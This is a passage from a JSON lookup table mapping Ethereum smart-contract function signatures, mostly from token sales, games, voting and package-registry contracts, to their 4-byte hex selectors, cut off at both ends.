"0x221ed748", "unlockDate3()": "0xb4d462b3", "doge()": "0x34809ee7", "round3Cap()": "0x54b61723", "MAX_PROMO_GIRLS()": "0x22fa1ff4", "mainSale1Limit()": "0xa00a3440", "promotorSale()": "0x4662fbdf", "withdrawUnclaimed()": "0x33fc56d9", "TOTAL_TOKENS_FOR_PRICE()": "0xd1c693f8", "mineral()": "0x5b0d4eff", "seatsCount()": "0xbedecc06", "phase_2_bonus()": "0x3029948a", "endFundingTime()": "0xe4693e98", "MAX_NON_SALE_SUPPLY()": "0x8eb64b61", "PRE_WIN_MULTIPLE_PER()": "0x08f0b1b0", "OMGBalance()": "0x73eaddf0", "MAX_PAYOUT_FRAC_BOT()": "0x2871587d", "xpTokenAddress()": "0x87b5f114", "RESEARCH_AND_DEVELOPMENT_WALLET()": "0x58dc2a8b", "gen0CutieCreatedCount()": "0x0019a46b", "buyCost()": "0xac0a7223", "marketmorties()": "0x2d1a330b", "Bounties_Wallet()": "0x4f424da3", "ICOSaleStart()": "0xc28f57ca", "summLeskiw()": "0xb3adfa0c", "cryptoJingles()": "0x2535b150", "fiveYearGrace()": "0x9d1ddca5", "product4_luckybuyTracker()": "0x47883fd9", "TEAM_LOCK_DURATION_PART2()": "0xae32ac7e", "RemainingTokenStockForSale()": "0x5c44a837", "zrxTokenContract()": "0xe17755c4", "creationInvestmentSupply()": "0xa6df33a2", "deathData_f12()": "0xdc8fbb44", "CurrentGameId()": "0x69a8c3bf", "eth2qiuRate()": "0x661b6dae", "registerbot()": "0x8f7ba0a1", "miningFinished()": "0x49dc2b83", "unburnedTypeTokens()": "0x02078166", "JackpotPeriods()": "0xe6f8263e", "STAGE_2_TIME()": "0xaf57d236", "ONE_DECIMAL_QUANTUM_ABC_TOKEN_PRICE()": "0xc6195d03", "curConfig()": "0x0c97bb77", "IsTransferFromOldContractDone()": "0x2a6389dc", "TeamBox()": "0xb2c2921a", "isPrePreSale()": "0x132df661", "createTokenToMarket()": "0xbe9d89c5", "increasePrice_20_February()": "0x95be55a6", "initCountTokens()": "0xec0b4207", "tokenPool()": "0x104e9929", "uniqueSpinnersActive()": "0x8f9de24b", "turnOffCanUpdatePercentToTakeAsSeed()": "0x7b841eff", "softCapCHF()": "0xa566d383", "nextTarget()": "0x3ab562f2", "refererPercent()": "0x6ff1f2b8", "timestep()": "0x062d0f09", "hasPresaleEnded()": "0x5d02b2f7", "actualTotalSupply()": "0xd657ae0c", "playValue()": "0x479e840f", "PRE_CROWDSALE_DURATION()": "0x8aa35083", "thirdStageEnd()": "0xe765bc5a", "o2Address()": "0x29f69427", "drainEther()": "0x1927a754", "publicEventActive()": "0xd216a86c", "REQUIRED()": "0x67fdff26", "_endTime()": "0x40d48958", "thirdroundprice()": "0x191af4bc", "_goal()": "0xfba939f8", "totalTokenCap()": "0xb4b68490", "priceEthPerToken()": "0x907b270b", "executiveOfficerAddress()": "0x0015be71", "bountyPool()": "0x08637d20", "fundPreSale()": "0xe8acee9e", "standart()": "0xf54095a7", "totalContribution()": "0x0dcf4b8f", "available_shares()": "0x5131f01d", "poiLockup()": "0xdd4e8823", "proofTokensAllocated()": "0x72d376b6", "ETH_USD_EXCHANGE_CENTS()": "0x25a86d56", "month48Unlock()": "0x3af5b3aa", "advisorsTokens()": "0x6078268b", "DECIMAL_ZEROS()": "0x414d784e", "globalTransferLock()": "0x08bbd947", "checkMyDonation()": "0xfecca5a5", "withdrawTeamPot()": "0x82757f99", "RATE_SALESTAGE5()": "0x55d7fe2b", "minimumFeePlusDividends()": "0x03d0b7d2", "bonusRateInPercent0()": "0x63d4d4a9", "ACLYDCoinContract()": "0xa4d97569", "founderTokenWithdrawnPhase2()": "0x67eccc12", "totalSuplay()": "0x16fa99be", "reservedAmount()": "0xf92c45b7", "typeB()": "0x2b2e7159", "miningTarget()": "0x8a769d35", "configRoundKey()": "0x6d796253", "totalDividend()": "0x4b6acafb", "preBonus()": "0xd6cfece1", "maxMintPoS()": "0x42740286", "betFeeMin()": "0x397e8091", "maxPreICOSupply()": "0xa720faa9", "inflateSupply(uint256)": "0xff05edd8", "fechVoteResultForCandidate()": "0xa4adc431", "fechVoteNumForCandidate()": "0xacb09dde", "fechVoteInfoForVoter()": "0xe47d914a", "voteResult()": "0x003259ea", "voteCurrentResult()": "0x4aa5b398", "releaseAmount()": "0xc062dc5f", "deleteVoterForCandidate(uint256)": "0x720de551", "updateCandidateInfo(address)": "0xdfb4a12e", "updateVoteInfo(address)": "0xb278b8df", "doVote(address,uint256,uint256)": "0xc9620770", "voteNoLock(address,uint256)": "0x5dc824b9", "multiVoteNoLock(address[],uint256[])": "0x7f93354b", "payDepositByCandidate()": "0x927731c8", "deleteCandidates(address)": "0xabe6c54d", "updateCandidate(address,bytes32,bytes32)": "0xaeaf7fc1", "addCandidate(address,bytes32,bytes32)": "0x45fdef65", "endVote()": "0xb9223946", "beginVote()": "0x28bc5ee4", "changeVotingBlocks(uint256,uint256,uint256,uint256,uint256)": "0xa1fa540d", "getUserData(address)": "0xffc9896b", "terminateTokenLock()": "0xae6e11dc", "lockFunds(uint256,uint256)": "0x3287db4b", "HappyFutureToken()": "0x3c489238", "createGen0Token(address)": "0x63396109", "createPromoToken(uint256,address)": "0x314cd12c", "bidOnBreedingAuction(uint256,uint256)": "0x6a226077", "createBreedingAuction(uint256,uint256,uint256,uint256)": "0xe0741187", "overrideTokenHolder(address,uint256)": "0xe1a67cd3", "overrideTokenHolders(address[],uint256[])": "0xc929d55e", "isdelegatinglisted(address)": "0x5aaec2b1", "authorizeMany(address[50])": "0x8b9299dc", "transferAdministratorship(address)": "0xa9f0a590", "isEqualLength(address[],uint256[])": "0x83c3bd6b", "executeTopic()": "0x71f64a68", "newProposal(uint256,uint256,string)": "0xa2267a3a", "approves(address,uint256)": "0x120bd501", "transfeFrom(address,address,uint256)": "0x1b0fa385", "getCountryCount()": "0x4d425812", "SellIPG(uint256)": "0x208ca719", "BuyIPG()": "0x8536bf8f", "purchaseCountry(uint256)": "0x20dfcd27", "addCountry(uint256,uint256)": "0xd6c9d27a", "stopSelling(bool)": "0x1c8ca56d", "setIPGInfo(address,address)": "0x7c13ed68", "changeDiscountStep(uint256)": "0xc5f4c98b", "changeTreshold(uint16)": "0x0ec173d0", "claimOwner(address)": "0xd27482a4", "MultiSender(address,address)": "0x4069de8b", "pay(bytes32,address[],uint256[])": "0x13ee4bc5", "getEpmBalance(address)": "0x10ef1976", "isProposalEnded(bytes32)": "0x9814d0ee", "getProposalHash(string)": "0x3cd17060", "getRandom(bytes32)": "0xb737ed1b", "getProposalByHash(bytes32)": "0x971d2bd8", "getProposalByID(uint256)": "0x867c7eda", "countAllProposals()": "0xb7d3cb87", "New(string,uint256,uint256,string,string)": "0xf835eb1b", "unCertifyDelegate(address)": "0x0c52780d", "network()": "0x6739afca", "removeAccessor(address,address,address,string,uint32,string,string,bytes32,bytes32,uint8)": "0x15f2226e", "addAccessor(address,address,uint8,address,string,uint32,string,string,bytes32,bytes32,uint8)": "0x1bf38b28", "constructUserIdentity(address,string,uint32,string,string,bytes32,bytes32,uint8)": "0xdb4ad99f", "checkUserSignature(address,string,uint32,string,string,bytes32,bytes32,uint8)": "0xc4dd3b33", "checkSignature(string,uint32,string,string,bytes32,bytes32,uint8)": "0x7bcaf585", "doHash(string,uint32,string,string)": "0x1e1e0a5e", "encodeString(string)": "0xe334f32e", "encodeAddress(address,address)": "0xe1e9e249", "encodeUInt(uint8,uint256)": "0x592a97de", "uintToChar(uint8,uint256)": "0xd05b7ca4", "transferEth(uint256,address)": "0x49f9c0e4", "removeAccessor(address)": "0x2ec9ad44", "addAccessor(address,uint8)": "0xd1b33094", "getAccessorPurpose(address)": "0xe5bcb303", "endBorrowAgreement(string,string,uint256,uint256)": "0x14bc3efc", "setBorrowAgreement(uint256,uint256,string,string)": "0x4cbb7532", "testpidgeon()": "0xf551924c", "_getTokenAmount(uint256,uint8)": "0xec204f87", "_preValidatePurchase(address,uint256,uint8)": "0xd96c550a", "_getStageIndex()": "0xac988bdc", "getExtraDays()": "0x6d35b1dc", "addExtraDays(uint256)": "0x871d3eab", "ActivateEscrow(uint256,uint256,uint256,uint256,address)": "0x6b06c3d4", "ITSMToken()": "0x7268475b", "GetEscrowNotifierAddress()": "0x3855b3dc", "getNickName(address)": "0xead0327d", "p4()": "0xc3b9f21e", "getAirdropStats(address)": "0x69bba72f", "playFor(address,bytes32)": "0x15a75f9f", "purge()": "0x70f0c351", "setMaxRoundSize(uint256)": "0xb8f48d3d", "setMinRoundSize(uint256)": "0x917418c1", "maxRoundDelta()": "0xe34e7cda", "airdropPlays()": "0xcaac87d0", "airdropThroughput()": "0x6721ebe2", "highRoller()": "0x663fc7e0", "roundSize()": "0x5e9d2b1f", "minRoundSize()": "0x4f31e3ec", "p5()": "0x33705526", "position()": "0x09218e91", "finalPrice()": "0xa6b513ee", "totalReceived()": "0xa3c2c462", "owner()": "0x8da5cb5b", "WAITING_PERIOD()": "0x6f85c7e4", "bids(address)": "0x62ea82db", "gnosisToken()": "0x60fd902c", "wallet()": "0x521eb273", "startBlock()": "0x48cd4cb1", "claimTokens()": "0x48c54b9d", "calcTokenPrice()": "0x39f64b52", "MAX_TOKENS_SOLD()": "0x17f5de95", "TOTAL_TOKENS()": "0x0b7abf77", "emergencyCall()": "0x299ed37a", "mergencyCall()": "0x99e0021f", "withdrawForWorkshop()": "0xf3a44fe1", "updateStage()": "0xc062f578", "fund()": "0xb60d4288", "changeBaseValue(uint256)": "0x92a781d8", "withdrawFunding()": "0x30b9af98", "setup(address,address)": "0x2d34ba79", "getReleaseValidator()": "0x4961b40c", "getReleaseDb()": "0xfb3a1fb2", "getPackageDb()": "0x271cd760", "activateRegistrar()": "0x3ea3f6c5", "Registrar(address,bytes32,address)": "0xa31d5580", "register(bytes32)": "0xe1fa8e84", "sha3HexAddress(address)": "0x27b752b8", "node(address)": "0xbffbe61c", "claim(address)": "0x1e83409a", "ReverseRegistrar(address,bytes32)": "0xe571c35e", "state(bytes32)": "0x61d585da", "setDnsrr(bytes32,bytes)": "0x76196c88", "dnsrr(bytes32)": "0x126a710e", "DNSResolver()": "0x6f0cfab6", "validateReleaseVersion(uint32[3])": "0xf4ea95b9", "validateReleaseLockfileURI(string)": "0xfa28ba0d", "fetchString(address,bytes4,bytes32)": "0x91060168", "isPackageOwner(string,address,address)": "0x79c3ddc1", "getReleaseLockfileURI(string,uint32,uint32,uint32,string,string)": "0x1f6b0a9d", "getReleaseHashes(uint256,uint256)": "0x79cce1c5", "getAllReleaseHashes()": "0x4cb71b9b", "getPackageReleaseHashes(string,uint256,uint256)": "0x12cc08f2", "getAllPackageReleaseHashes(string)": "0xc392f5a0", "getReleaseHashForPackage(string,uint256)": "0xcec95aa1", "getPackageData(string)": "0xc2ba5b40", "getPackageName(uint256)": "0xcfe9a7b8", "releaseExists(string,uint32,uint32,uint32,string,string)": "0x4188d79c", "packageExists(string)": "0x83ea0620", "transferPackageOwner(string,address)": "0x4f197ee7", "release(string,uint32[3],string,string,string)": "0x0f3d7c3e", "release(string,uint32,uint32,uint32,string,string,string)": "0x5fcb568c", "setReleaseValidator(address)": "0x10ae4ce2", "setReleaseDb(address)": "0xf314bf46", "setPackageDb(address)": "0x34c0d654", "hashName(string)": "0xaf9a3f9b", "getPackageName(bytes32)": "0x06fe1fd7", "getPackageData(bytes32)": "0xb4d6d4c7", "getPackageNameHash(uint256)": "0x95f0684b", "getNumPackages()": "0x7370a38d", "packageExists(bytes32)": "0xa9b35240", "setPackageOwner(bytes32,address)": "0x2406cedb", "removePackage(bytes32,string)": "0x001f8d11", "setPackage(string)": "0x083ae1fe", "setAnyoneCanCall(address,string,bool)": "0x20d9822e", "setAnyoneCanCall(address,bytes4,bool)": "0x02acdb44", "setCanCall(address,address,bytes4,bool)": "0x87045369", "Authorized()": "0xeacfc0ae", "canCall(address,address,bytes4)": "0xb7009613", "castStringToUInt(string)": "0x55ff440a", "isNumericString(string)": "0x2fc0aad3", "splitIdentifiers(string)": "0xdd79e33e", "compareNumericStrings(string,string)": "0x15398afe", "compareStrings(string,string)": "0xbed34bba", "updatePreReleaseTree(bytes32)": "0x900d85fa", "updatePatchTree(bytes32)": "0xb6ac24df", "updateMinorTree(bytes32)": "0x44d75fa9", "updateMajorTree(bytes32)": "0x02556de3", "isLatestPreReleaseTree(bytes32,bytes32)": "0x02de2cf3", "isLatestPatchTree(bytes32,bytes32)": "0xc233e870", "isLatestMinorTree(bytes32,bytes32)": "0xd1f59db9", "isLatestMajorTree(bytes32,bytes32)": "0xd7cc8362", "getLatestPreReleaseTree(bytes32,uint32,uint32,uint32)": "0xdea9c72b", "getLatestPatchTree(bytes32,uint32,uint32)": "0x5263ba87", "getLatestMinorTree(bytes32,uint32)": "0xf2f254c7", "getLatestMajorTree(bytes32)": "0x3ae9b510", "hashRelease(bytes32,bytes32)": "0x93d79105", "hashVersion(uint32,uint32,uint32,string,string)": "0x0e5ffb3c", "getReleaseLockfileURI(bytes32)": "0x2ffb8631", "getBuild(bytes32)": "0x8ca4eef6", "getPreRelease(bytes32)": "0xfac5bb92", "getMajorMinorPatch(bytes32)": "0x0c4326a0", "getReleaseData(bytes32)": "0x4c4aea87", "versionExists(bytes32)": "0xbb814e9e", "releaseExists(bytes32)": "0x3f415772", "getReleaseHashForNameHash(bytes32,uint256)": "0x0c26e42e", "getNumReleasesForNameHash(bytes32)": "0x173cb7de", "getReleaseHash(uint256)": "0x57b07cd9", "getNumReleases()": "0x0ccec396", "setVersion(uint32,uint32,uint32,string,string)": "0xa10889fa", "updateLatestTree(bytes32)": "0x89859b50", "Release()": "0xdf3164c6", "LockBalance(address)": "0x2a61ae19", "isLock(address)": "0x5016128e", "UnlockAll()": "0xaeaabffe", "Unlock(address)": "0x0be77485", "addLockAccount(address,uint256)": "0x3f5ea068", "getContractRhemBalance()": "0x87f404cd", "TNT()": "0x0aaa9e46", "SearchUserID(string)": "0xc937e091", "creatUserID(string)": "0xcacd7a66", "SearchMyFiles(string)": "0xb3d159bf", "creatUserPurchase(string,string)": "0x2932ea90", "SearchUserPurchase(string,string)": "0xc127ee20", "SearchIPR(string,string)": "0x9db40718", "SetIPR(string,string,address,string,string,uint256,string,string,string)": "0x28c11fd6", "ownFiles(string,string,string)": "0xa87f32a2", "Paye()": "0x57b7a0b6", "PaymentTimer()": "0x6a69424b", "SingularityTest2()": "0x0845e2d8", "RudiantoToken()": "0x3fc4e866", "publishMetaData(bytes32,bytes1)": "0x41409437", "swap(bytes32,address[5],uint256[6],uint8,bytes32,bytes32)": "0x62c1f389", "Prout()": "0x0c28e291", "setKyberProxyAddress(address)": "0x7aa3f6cb", "whitelistKyberAddress(address)": "0x217af162", "getNumberOfRequest()": "0x3f2c0e35", "applyFromCertificate(string,string,string,uint256)": "0xfec6c66e", "getNumberOfCourse()": "0xc5566dac", "addCourse(uint256,uint256,string,string,string)": "0xead81e86", "AirTransfer(address[],uint256,address)": "0x76884153", "nemocoin()": "0xd7471ad2", "TrenoToken()": "0x994aca84", "MoxianCoin()": "0xaf3cc6be", "UKToken()": "0x72f5bb30", "BancarCrowdsale()": "0x58802e24", "GSEN()": "0x3e3ce4f3", "MassPay()": "0x2210e0f7", "Aunder()": "0x7a0092b5", "computeVoteOutcome(uint256)": "0x249559ad", "closeVote(uint256)": "0x6e48a035", "getVoteDetails(uint256)": "0x54a1b431", "getNumberOfVotes()": "0xcee024dc", "initiateVotingContractUpdateVote(string,address)": "0x062907d5", "initiateDocumentVote(string,bytes32)": "0x59198827", "initiateBoardMemberVote(string,bytes32,address[])": "0x8a61bb91", "purchaseTokens(uint256,uint256)": "0x8bf0af3e", "XYZSecurities()": "0xc97b5278", "checkForLog(string)": "0xa15c1788", "removeLog(string)": "0xcfdf35b6", "addLog(string)": "0x91dc956d", "CNC(uint256,string,uint8,string)": "0xc6512a33", "wantNewMinter(address)": "0x2233dbf4", "wantNewTokens(uint256[])": "0x6c4e838a", "ownerWantMyEther()": "0xdd486c35", "whaleWantMyEther()": "0x530c435f", "wantToBeWhale()": "0x55247a52", "wantMyEther()": "0xc1bd762b", "wantMyToken(uint256)": "0xd744f2a3", "wantItMoreThanYou(uint256)": "0x27180e42", "wantItForFree(uint256)": "0xb32b664f", "tokensCount()": "0xa64ed8ba", "singleInvokeWith2Args(address,string,address,uint256)": "0x1e83bab7", "setSelfContractAddress(address)": "0x00152924", "transferWithFee(address,address,uint256)": "0xf3408110", "VividoRaidenToken()": "0x8a449c2c", "HamidToken()": "0x02d0181c", "mayorcoin()": "0x6b27be9f", "TRICToken()": "0xe6af2d5d", "BOSHICoin()": "0xc8df5da0", "MyAdvancedTokenV2(uint256,string,string)": "0x0a4da2d4", "D00KIE()": "0x4a024928", "BITCASH(string,string,uint8,uint256)": "0xcf488329", "getTokenTotalSupply()": "0x57df844b", "getTotalFundationTokens()": "0x0d26c879", "getMaxCommunityTokens()": "0xd8730ef2", "crowdsaleClose()": "0xd16f8669", "derpcoin()": "0x14dcd58f", "internalTransfer(int256,address,address)": "0xa66ee056", "allowAddressDelegate(address,address)": "0x410af6b6", "allowAddress(address)": "0x08af4d88", "delegateGetTokens(address,uint256)": "0xfa309571", "updateLock(uint256)": "0xdfc8bff1", "_updateLock(uint256,address)": "0x4b3f3987", "setGasForward(address)": "0x6f92096b", "updatePolicy2(bytes32,string,uint256,uint32,string)": "0x3b0da3b8", "updatePolicy(bytes32,address,uint32,uint32,uint256,uint256,bool)": "0x5a6c6408", "LEOToken()": "0x12630012", "endOfGame(address)": "0x8bc9b67f", "endOfRound()": "0x5851166c", "wrestle()": "0x03cc5597", "registerAsAnOpponent()": "0xa8b42f1f", "issueRIU(address,uint256)": "0x69f10ce1", "getBid(bytes32,uint256)": "0x29b03cfd", "getBidCount(bytes32)": "0x15659dde", "LuzCoin()": "0x104d7bbb", "ELCToken()": "0x0cf3da77", "DOOMCOIN()": "0x78e619df", "BouCrowdsale(uint256,address,address)": "0x36cb8098", "Bou(address)": "0xd342c598", "RDXToken()": "0xa4b3b042", "BetDirectory()": "0x4235e336", "transfer(address,uint256,bytes1[])": "0x750e1f59", "ManagerProxy(address,bytes32)": "0x49e44f44", "create(bytes32,bytes32[3],bytes32,bytes32)": "0x38a21db8", "getNumberVote(uint256)": "0x1f2d8d66", "winningProposal(uint256)": "0xbcd60f6c", "vote(uint8,bool)": "0x2808241e", "loadFunds()": "0xb2f3d299", "execute(uint128,uint128)": "0x9ac17057", "lookup()": "0xf5e3542b", "prometh(address)": "0xe7829152", "getMessageGas()": "0xa3bc6163", "getMessageValue()": "0x47d52d86", "getMessageSender()": "0x76167a89", "getMessageData()": "0xe20c6d3d", "getCurrentMiner()": "0x10bc3c75", "ChainInfo()": "0x2b6bd13a", "manuallyAssignTokens(address,uint256)": "0x1d1ada90", "prepareLiquidityReserve()": "0x53999339", "isIcoFinished()": "0x7a543a94", "unhaltFundraising()": "0xa0c1e119", "haltFundraising()": "0x3de9c8e6", "setIcoDates(uint256,uint256)": "0x7c871d31", "forwardFundsToWallet()": "0x32347487", "SomaIco(address,address,address,uint256,uint256,uint256)": "0xef0377fd", "KryptopyCrowdsaleMock(uint256,uint256,uint256,uint256,uint256,address)": "0x4c7c3ca1", "KryptopyCrowdsaleMock(address)": "0x84be414d", "RokToken()": "0xf8976385", "controllerApproval(address,address,uint256)": "0x7f71f1f9", "controllerTransfer(address,address,uint256)": "0x9b504387", "createReaderWriter(bytes32,address,address,bytes32)": "0xe868b55e", "withDrawMyBalance()": "0xd5f52d51", "getLotteryResultTotal(address)": "0x1a000513", "joinOneLottery()": "0xc25615c0", "getCurrentLotteryJoiners()": "0xbe482cc2", "OCLotteryContract()": "0x2f2f010c", "setOneGroupJoinersCount(uint256)": "0xb4c93fc0", "Roles2LibraryAndERC20LibraryAdapter(address,address)": "0xcdf90e02", "Governable()": "0xd65b476c", "distributeFunds(address,uint256,address,address,address)": "0x7321ffa6", "getTransferDetails(address)": "0xd9e39e50", "expireTransfer(address)": "0xe71b7913", "claimTransfer(address,address)": "0x0cac54ed", "newTransfer(bool,address,address,uint256,uint256,uint256)": "0xc5d2577c", "TransferIndex()": "0x5254b595", "totalOwners()": "0x243669ad", "MyToken(string,string)": "0x7aacd17d", "del(uint256)": "0x57771a23", "__process(bytes,address)": "0xf2d6e0ab", "toBytes(bytes4)": "0x609ec605", "getSpecId(bytes)": "0x46190e16", "copy(bytes,uint256,uint256,uint256)": "0xe2fecdf3", "abiLength(address[])": "0x91e88106", "abiEncode(bytes,bytes,address[])": "0x137d7026", "storeLedgersInIpfs()": "0x71393c60", "releaseFundsWhenBothSigned()": "0x56f464ea", "getHashAddresses()": "0x9e9ec9e3", "getInitialData()": "0x6e8dba91", "Transaction(address[2],bytes,uint256,bytes32[2],uint256[3],bytes32[3],bytes,bytes)": "0x1ded2d87", "getCalls()": "0x50f2fb7f", "redeemForAllFeeWindows()": "0x1651f29a", "bla(address)": "0xa39ab3a3", "IncomeTaxCalc()": "0x1ddf9729", "canCall(address,address,address,address,bytes4)": "0xfe7d1587", "setDeploymentAdminsContract(address)": "0xe75623d8", "testApproveTransfer()": "0x716437b5", "testTransfering()": "0xd7bd8987", "testMinting()": "0x72ba8259", "trexdevshopWaited1Years()": "0xd5e4b342", "VoteInOrganizationScheme()": "0xf9c397f8", "HahaCoin()": "0x7eee1ab6", "testInitialBalanceWithNewRGXToken()": "0x9d41d6fc", "sam()": "0x7edba6c8", "PBToken(address,address)": "0x923a367f", "getTargetBudget(uint256,uint256)": "0xfe68f73b", "getDuration(uint256,uint256)": "0x5fea3de9", "getNumberSources(uint256,uint256)": "0xae850da9", "getNumberMilestones(uint256)": "0xede5f66f", "buildMilestone(uint256,uint256,uint256)": "0xd9f0354d", "getContractName(uint256)": "0x21d8ad4c", "getContractHash(uint256)": "0x0e9f0816", "getNumberContracts()": "0xeac66cd8", "buildContract(string,string)": "0x1045a889", "Lesson_5(address,uint256)": "0x6a261353", "getOuLianPublicAddress()": "0x345393f0", "GetPatientFromAddress(address)": "0x1af88bc1", "IsPatient(address)": "0xcc10d53d", "GetPatient()": "0xff2311a4", "DeletePatient()": "0x752b016d", "MakePatient()": "0xefbe3894", "PatientFactory()": "0x2b5570ad", "registerContract(bytes32,address)": "0x645c6fae", "setCreditDao(address)": "0xfa3e9b45", "editAccountData(address,string,bytes)": "0x5ea81e07", "editAddressDescription(address,string,address)": "0xd0c1d117", "toggleFieldActivation(string)": "0xfe675f13", "addField(string,uint256)": "0xa10f0f5a", "getAccountData(address,string)": "0x6bea0b79", "approveMappingProposal(address,address)": "0x486a03e0", "addAddressMappingProposal(address,address)": "0xe1bdc3c9", "getByte()": "0x60585358", "UUIDProvider()": "0xf666323e", "invoke(uint256,address,address,bytes)": "0xd81ab0c1", "variable(uint256)": "0x1aca00fd", "fails()": "0xce869a64", "infinite()": "0x5bec9e67", "set(uint256)": "0x60fe47b1", "undo()": "0x881be8f7", "doit()": "0x4d536fe3", "__kill()": "0x16f3cb5e", "GasProxy(address,address)": "0xafd8c8c4", "fillOrder(address,uint256)": "0x9c7264d7", "fillOrder(uint256)": "0x67b830ad", "Order(address,uint256)": "0xa6b197aa", "ReplicatorFactory()": "0xdda3342b", "schedule()": "0xb0604a26", "replicate()": "0x50c42921", "Replicator(bytes,uint256,uint256,address)": "0xe59d843a", "build(bytes,uint256,uint256,address)": "0xd6c19fe0", "__outputCallback(uint256)": "0x4c0e207a", "requestExecution(bytes)": "0xf1448e10", "StatefulFactory(string,string,string)": "0x4f223fe3", "getDefaultSoftResolutionBlocks()": "0x03427656", "StatelessFactory(string,string,string)": "0xd8f012c6", "FactoryBase(string,string,string)": "0x5d8227e6", "reimburseGas(uint256,address,uint256,uint256)": "0x9c5d7030", "isStateless()": "0x53770f9a", "min(uint256,uint256)": "0x7ae2b5c7", "build(bytes)": "0x6835f32c", "remainingGasFund(uint256)": "0xaf29e720", "gasScalar(uint256)": "0xa6b1caa3", "_getRequest(uint256)": "0x5d3c1d4c", "Broker(address)": "0x29d28aad", "reclaimDeposit(uint256)": "0x96e438a1", "finalize(uint256)": "0x05261aea", "executeExecutable(uint256,uint256)": "0x6dc3edcf", "initializeDispute(uint256)": "0x7b0383b2", "Fibonacci(bytes)": "0x8e3d4e5e", "challengeAnswer(uint256,bytes)": "0xfcce2622", "totalGas(bytes)": "0x8143f8a8", "softResolveAnswer(uint256)": "0xa8978434", "_build(bytes)": "0xe10e5dce", "answerRequest(uint256,bytes)": "0xc70d169d", "BuildByteArray(bytes)": "0x5ea187c9", "cancelRequest(uint256)": "0x3015394c", "requestExecution(bytes,uint256)": "0x9bee757b", "TestFactory()": "0x5023d124", "getRequiredDeposit(bytes)": "0x13a396d8", "getChallengeAnswerResult(uint256)": "0x0411bca8", "getChallengeAnswer(uint256)": "0xafc24e3d", "getInitialAnswerResult(uint256)": "0xcaaf2dd7", "getInitialAnswer(uint256)": "0xf95b5a58", "getRequestResult(uint256)": "0x5944427b", "getRequestArgs(uint256)": "0x7a479160", "getRequest(uint256)": "0xc58343ef", "ExecutableBase(bytes)": "0x665beae7", "executeN(uint256)": "0xc64e8bc0", "executeN()": "0xfd735602", "requestOutput(bytes)": "0x3c9a4baa", "getOutputHash()": "0xcf31e9fe", "isFinished()": "0x7b352962", "step(uint256,bytes)": "0x0761a004", "extractUint(int256,bytes,uint256,uint256)": "0x1f8947c1", "toUInt(bytes)": "0xc490a266", "toBytes(uint256)": "0x775a8f5e", "makercoin(uint256)": "0x1de38038", "issue(address,uint256)": "0x867904b4", "testTransferringMkr()": "0xb0166b04", "testDistribution()": "0x524e4e61", "testPassingAProposal()": "0xc1257bad", "testProposing()": "0xd83a8d11", "testFailAddingMembers()": "0x9380b8e7", "testDeploy()": "0x354b2735", "testContractsNotNull()": "0x845051d3", "deploy()": "0x775c300c", "setUp()": "0x0a9254e4", "step8()": "0xa3221c8e", "step7()": "0xbddd3a6b", "step6()": "0xeb7c6f72", "step5()": "0x4fb4bcec", "step4()": "0xfb5d7376", "step3()": "0xdf4ec249", "step2()": "0x8f4ed333", "step1()": "0xd40a71fb", "registerUser(string,address)": "0x0e54b872", "lookupUser(string)": "0xb2aac51f", "owned()": "0xdf32754b", "transferOwnership(address)": "0xf2fde38b", "KudosProxy(address)": "0xf009347d", "KudosBank(uint256)": "0xda1441cd", "spend(uint256)": "0x1dbf3bc7", "giveKudos(address,uint256)": "0x2b25a7e4", "givableBalanceOf(address)": "0xce79add1", "grantGiveableKudos(address,uint256)": "0xf2371fb3", "moveBalance(address,address,uint256)": "0xd70cf105", "subBalance(address,uint256)": "0xcf8eeb7e", "addBalance(address,uint256)": "0x21e5383a", "setBalance(address,uint256)": "0xe30443bc", "getBalance(address)": "0xf8b2cb4f", "getSupply()": "0x6c9c2faf", "referrerLevel3Ether()": "0x470ca291", "bounty_paid()": "0x5f8cb3f6", "COIN_PER_ETHER_ACTIVE()": "0x2adc2cd2", "closingDateFunding()": "0xbb843219", "ADDR_WITHDRAWAL2()": "0xc144a510", "getQuoters()": "0x640959bc", "totalAddresses()": "0xcfad5277", "pValidationState()": "0x810a217f", "shitRate()": "0x77afd7e6", "mainSaleStartTime()": "0xb0aa09f2", "PRESALE_BONUS_LIMIT()": "0x3735d57d", "tokensPerDollar()": "0x650c2b28", "_escrowIndex()": "0xc5bef690", "timestampMint()": "0x72a7655e", "sourceTokens()": "0xb2f7e989", "FIRSTSALE_TOKENCAP()": "0x99abd788", "subFundPrecent()": "0x7ac8dc26", "toAllow()": "0x0b483f6e", "wpTokensBaskets()": "0x09fa6f96", "SpoolAmount()": "0x735056a3", "transferOutEth()": "0x8f87c84b", "codeExportEnabled()": "0x706a99fb", "ethFnkRate2()": "0xfd12c1cb", "shareholder2()": "0x70780a7a", "jobPost()": "0x94566d25", "performInitialAllocations()": "0x5582df33", "approvedTill()": "0x40499ae8", "firstVestedLockUpAmount()": "0xca2e2f49", "WatcharaHashCoin1()": "0xa3011a02", "alliesContract()": "0x40df280e", "getAllIdentifiers()": "0x5de3ba97", "marketingTokenAddress()": "0xd17d25de", "current_item_index()": "0x9f4cd0ef", "day3Start()": "0x3bf4ac5c", "IS_CND_CONTRACT_MAGIC_NUMBER()": "0xc16d1377", "myWinShare()": "0x4bfde393", "tierTwoRate()": "0xe309d1b5", "maxBetCoinDice()": "0x2bec76fd", "PGO_INTERNAL_RESERVE_CAP()": "0x60bf4dd5", "melonport()": "0xfd222745", "CoreTeamAndFoundersSupply()": "0x50e2ccad", "tokensBurnedTotal()": "0xd3e7d44d", "networkPlaceholder()": "0xdeae5d4d", "minPurchasePreICO()": "0x5509f0f3", "saleDateStart()": "0x086914c3", "contributorPoolMintQuota()": "0xe2c8a8ad", "_price_tokn_ICO2()": "0x9764053b", "donationsEndedTime()": "0x23749f69", "unfreezingTimestamp()": "0xde2994c4", "ADVISORS()": "0x4ed87713", "vision()": "0x07062cf2", "financialStrategy()": "0xf6a8aea7", "walletOut2()": "0x5bad9fa7", "weiToTokenFactor()": "0xec176dee", "lunyrMultisig()": "0x8e73d42c", "KERNEL_APP()": "0x25012699", "contractPaused()": "0x8a67456a", "DEFAULT_DURATION()": "0xc297fa0f", "PRICE_STAGE_PRESALE()": "0x37273b86", "currentFundingAmount()": "0xeca3ee2c", "internalBalance()": "0x2e6245c6", "APP_BASES_NAMESPACE()": "0xdb8a61d4", "bonusSecondIco()": "0x48bc2a21", "XBLContract_addr()": "0x606da54e", "rewardCheckpoint()": "0x06b8ef4a", "getActualPrice()": "0x6cc09081", "ethSold()": "0xb171ae40", "defaultExchangeRate()": "0x2362189a", "giveDividend()": "0x85f19bc4", "adjustedRaised()": "0x331e58a1", "feeBurnerContract()": 